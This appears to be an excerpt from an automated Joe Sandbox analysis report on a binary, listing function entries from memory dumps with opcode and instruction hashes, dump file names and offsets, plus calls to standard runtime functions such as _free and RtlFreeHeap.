                                                                                    • Opcode ID: c65b3c1c80fe2f8bdbc5ae2ad7b0097a9ac7da646c5feeba36913288095c762c
                                                                                    • Instruction ID: 93784157fc97081a81af3bd1546accd2f95f724899b95386b8cdedf1df7055fa
                                                                                    • Opcode Fuzzy Hash: c65b3c1c80fe2f8bdbc5ae2ad7b0097a9ac7da646c5feeba36913288095c762c
                                                                                    • Instruction Fuzzy Hash: F2A02230202200EFAB808F32AF0E30C3AE8BF0B3E0300802CA008C2A30EB30C3C08B00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                    • Instruction ID: 9cbd1384dfc64a112ec3514ebb3a72c541076d078f3cdb4be39fcef043a08f90
                                                                                    • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                                                                    • Instruction Fuzzy Hash: F862E771604B859FCB29CF38CC906B9BBE2AF55304F09856ED8AB8B346D734E955CB10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                    • Instruction ID: 4feaeb1a917ce446e7c4f702e572eb9f59f0634aaffa00ef5a0778e4335ccd3b
                                                                                    • Opcode Fuzzy Hash: 90a98d7e6f2e54dcba7a323e5310e852aff7c38bf50c3d5cf95a57ea582718e0
                                                                                    • Instruction Fuzzy Hash: 9A62F07160478A9FC719CF28CD905B9FBE0BF55308F14866ED9A68B742D730E969CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                    • Instruction ID: 6f5ccd7d6c568568ed07d446eebad1d009bd5e8d0e67ccb8e4396368e0c5053d
                                                                                    • Opcode Fuzzy Hash: c11df8756d099823b9e38222dbb77727418297263203a366b416988efb5d9dfb
                                                                                    • Instruction Fuzzy Hash: 725249B2A047019FC758CF18C891A6AF7E1FFC8304F49892DF9969B255D334E959CB82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee1b906e5cdbe790ef068419de70b2a1437e40131cff61504542b3b6f42b1f0e
                                                                                    • Instruction ID: 89368d8a9407ebaffad802c4323ab06ba74016504ea5222155d5f6e9bc9e528e
                                                                                    • Opcode Fuzzy Hash: ee1b906e5cdbe790ef068419de70b2a1437e40131cff61504542b3b6f42b1f0e
                                                                                    • Instruction Fuzzy Hash: 6C12B4B1604B068BC72CDF28C9D06B9B3E1FF55308F14892EE997C7A81D774A8A5CB45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ee64b9abfd6caaba819cdf5edc5f198d7bc4703004da04fd372bb33bc9a22f3
                                                                                    • Instruction ID: 69685257220c554e2bdf6bd4d2115a5e961f2c6e8f430bab96da33fdbb22667c
                                                                                    • Opcode Fuzzy Hash: 5ee64b9abfd6caaba819cdf5edc5f198d7bc4703004da04fd372bb33bc9a22f3
                                                                                    • Instruction Fuzzy Hash: 2BF17871A08345CFC718CF29C4C456ABBE2FF98715F144A2EF8A58B355D730EA098B46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                    • Instruction ID: 4d13e3a2f9510f79626eeafab905862dec60ad56b08dfbe4bf87100a0b13b25a
                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                    • Instruction Fuzzy Hash: 36C18F362051930ADB2D4679A97413EBEA15EA27B131A07BDE4B7CB1D4FF20C536DA20
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                    • Instruction ID: 1cf106da0708a0ea788cad1d98899049061c9ef36d465d6a2b2e07c80c0cbb20
                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                    • Instruction Fuzzy Hash: AAC1A1362091930ADF2D4679E97403EBEA15AA27B131A077DD8B7CB1D5FF20C536DA20
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                    • Instruction ID: 1179c32682f1310eb4126d54d8a90a71728b5cf9a7835c1a105227372c2c70a2
                                                                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                    • Instruction Fuzzy Hash: 87C172362051930ADF2D4679E97403EBEA15AA27B131A077DD8B7CB1D4FF10C576DA20
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction ID: 0fc91d535d241861bf25b2721f7903e1033239d97a6ef995322ab3efca5907f6
                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                    • Instruction Fuzzy Hash: 66C180362050934ADF2D4639D97803EBEA15AA27B131A17BDE4B7CB1C5FF20C535DA20
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 84534681927d0d551d83530a4cc010f1e42e28eaf2bc7283e8d38c08a7954a89
                                                                                    • Instruction ID: 41cc83b296b2f213ebed252ec6e7689d8c23db851fe7509871f6dda9340b534d
                                                                                    • Opcode Fuzzy Hash: 84534681927d0d551d83530a4cc010f1e42e28eaf2bc7283e8d38c08a7954a89
                                                                                    • Instruction Fuzzy Hash: BBE116755083808FC345CF69D89086ABBF0AFCA300F49495EF9D597362D335EA5ACB62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                    • Instruction ID: 01fce67c383d8989b87a8cb88aea0840c5ba99405529dc6206ed80f8610d8544
                                                                                    • Opcode Fuzzy Hash: 258a2619ca224506e2ce8481b4959e2ad5c6699b1b0424d45743f46b69a4843c
                                                                                    • Instruction Fuzzy Hash: 8991A9B1204B458BD724EF68DC94BBE73D5AF60300F14092DF9A68B282DBB59628C752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 221f9cdcaad3af84e66ca56946175f10b6c0a757d87c575b017c98a73dff4288
                                                                                    • Instruction ID: ed205d9be4c7e4a79a895866ef6ea3d097e3e299a1b57b48c406bbd664e11986
                                                                                    • Opcode Fuzzy Hash: 221f9cdcaad3af84e66ca56946175f10b6c0a757d87c575b017c98a73dff4288
                                                                                    • Instruction Fuzzy Hash: CC61897160070867DA394E688956BFE33B4EB36700F24C919E88EDB282D775DEC39316
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                    • Instruction ID: e50c0738e1ca064086517382808c5007bfcc7dec24f6df511426b329e65aa3f7
                                                                                    • Opcode Fuzzy Hash: 9ea23a0b5be8d720a81cc3f877502472f5d544f68c9a06fa8112536a0a6d4999
                                                                                    • Instruction Fuzzy Hash: 1E714A707043818BEB24DE68CCD4BBD37D1ABA1304F04492DE9E68B282DB74DA99C756
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0c939ba4d14b7b804a931462057feffe6bc8ecfcab404f52450912381c25fd0b
                                                                                    • Instruction ID: e36402a913be1c939318e0aff53915a1d7bc4182d685c4a0547c3a888cfc591c
                                                                                    • Opcode Fuzzy Hash: 0c939ba4d14b7b804a931462057feffe6bc8ecfcab404f52450912381c25fd0b
                                                                                    • Instruction Fuzzy Hash: D581CF9210A2D0ADC75A8F3D38E42E53FA1577B301F1D04ABD8D58BAA3D13686DDD722
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 23abbddd34a16cb9f19363b136f45132e8e4047a68dd169667f04476a4a289d5
                                                                                    • Instruction ID: 8d422d0426493c0da997103c660c8207de5355791495afd09185d254692ec72f
                                                                                    • Opcode Fuzzy Hash: 23abbddd34a16cb9f19363b136f45132e8e4047a68dd169667f04476a4a289d5
                                                                                    • Instruction Fuzzy Hash: 0451D0319083958EC722CF29918046EBFF1AFAA315F59489EE8E54B252C330D789CB53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb40b1c782fe9082a340f12c220babb0661b2065524db7bfd945a34690d1ba83
                                                                                    • Instruction ID: d1b2a3313f7bbc30ee6755c826a982abd809b97ea255c89763a18c052e7f1255
                                                                                    • Opcode Fuzzy Hash: bb40b1c782fe9082a340f12c220babb0661b2065524db7bfd945a34690d1ba83
                                                                                    • Instruction Fuzzy Hash: 0E512571A083028FC748CF19D49059AF7E1FF88314F058A2EE899A7740DB34EA59CB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                    • Instruction ID: b804b30b315c870bcdd3120e2fe5476886bd63d6ce516967dc6adb868ab58533
                                                                                    • Opcode Fuzzy Hash: 03d8200d211fb2155360bb18f1da6528e951efe338ec765a37701bdcb59cc893
                                                                                    • Instruction Fuzzy Hash: 1F31E0B160475A8FC714DF28CC5126ABBD0FB95301F04862DE8DAD7341C734E919CB52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51fce91e9f5d783804c7d7a1c3d93e88e6db355dab224693490672883548e41b
                                                                                    • Instruction ID: d5080658bcda5cc98f919f2de6266152dd67e8f68a64fb6f46ad92cffc3c3e27
                                                                                    • Opcode Fuzzy Hash: 51fce91e9f5d783804c7d7a1c3d93e88e6db355dab224693490672883548e41b
                                                                                    • Instruction Fuzzy Hash: 3321FF32A205655BCB08CF2DECF54367351EB46302786812BEE568F6D0C735EA69C7E0
                                                                                    APIs
                                                                                    • ___free_lconv_mon.LIBCMT ref: 001795D1
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 00179189
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 0017919B
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791AD
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791BF
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791D1
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791E3
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 001791F5
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 00179207
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 00179219
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 0017922B
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 0017923D
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 0017924F
                                                                                      • Part of subcall function 0017916C: _free.LIBCMT ref: 00179261
                                                                                    • _free.LIBCMT ref: 001795C6
                                                                                      • Part of subcall function 001759C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?), ref: 001759D8
                                                                                      • Part of subcall function 001759C2: GetLastError.KERNEL32(?,?,00179301,?,00000000,?,00000000,?,00179328,?,00000007,?,?,00179725,?,?), ref: 001759EA
                                                                                    • _free.LIBCMT ref: 001795E8
                                                                                    • _free.LIBCMT ref: 001795FD
                                                                                    • _free.LIBCMT ref: 00179608
                                                                                    • _free.LIBCMT ref: 0017962A
                                                                                    • _free.LIBCMT ref: 0017963D
                                                                                    • _free.LIBCMT ref: 0017964B
                                                                                    • _free.LIBCMT ref: 00179656
                                                                                    • _free.LIBCMT ref: 0017968E
                                                                                    • _free.LIBCMT ref: 00179695
                                                                                    • _free.LIBCMT ref: 001796B2
                                                                                    • _free.LIBCMT ref: 001796CA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                    • String ID:
                                                                                    • API String ID: 161543041-0
                                                                                    • Opcode ID: d80f4e0a4a3b95e6b9d8344ab23f1dceb9b570a90c7004718350b6981d5798ac
                                                                                    • Instruction ID: b60996eb43b18bf68934a330301c31599d24e31128d0f308a6211551512fd8c5
                                                                                    • Opcode Fuzzy Hash: d80f4e0a4a3b95e6b9d8344ab23f1dceb9b570a90c7004718350b6981d5798ac
                                                                                    • Instruction Fuzzy Hash: 05311971604701DFEF21AA38D885B9A73FAAF10324F20C52AF59DD7151DF76AD988B10
                                                                                    APIs
                                                                                    • GetWindow.USER32(?,00000005), ref: 0016B8DD
